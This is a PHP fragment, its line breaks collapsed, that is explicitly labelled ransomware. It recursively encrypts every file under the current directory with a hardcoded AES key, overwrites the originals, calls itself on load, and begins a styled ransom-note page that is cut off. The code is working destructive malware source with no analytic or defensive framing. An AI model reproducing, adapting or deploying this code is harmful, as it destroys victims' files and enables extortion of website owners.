$encryptionKey = 'SukaTank01'; // Change this to your desired encryption key// Function to encrypt a filefunction encryptFile($fileName, $encryptionKey) { $fileContent = file_get_contents($fileName); $encryptedContent = openssl_encrypt($fileContent, 'AES-256-CBC', $encryptionKey, 0, 'FuckY0URS1T3'); file_put_contents($fileName, $encryptedContent);}// Encrypt all files in a directoryfunction encryptDirectory($dir, $encryptionKey) { $files = scandir($dir); foreach($files as $file) { $filePath = $dir . '/' . $file; if(is_file($filePath)) { encryptFile($filePath, $encryptionKey); } elseif($file != '.' && $file != '..' && is_dir($filePath)) { encryptDirectory($filePath, $encryptionKey); } }}// Function to create glitch effect on textfunction glitchText($text) { $glitchedText = ''; for ($i = 0; $i < strlen($text); $i++) { $glitchedText .= '<span style="color: white; text-shadow: 0 0 2px #00FFFF, 0 0 5px #00FFFF, 0 0 10px #00FFFF, 0 0 20px #00FFFF, 0 0 30px #00FFFF, 0 0 40px #00FFFF, 0 0 55px #00FFFF, 0 0 75px #00FFFF;">' . $text[$i] . '</span>'; } return $glitchedText;}// Main ransomware functionfunction ransomware($encryptionKey) { // Encrypt files in current directory encryptDirectory('.', $encryptionKey);}// Call the ransomware functionransomware($encryptionKey);$notes = '<!DOCTYPE html>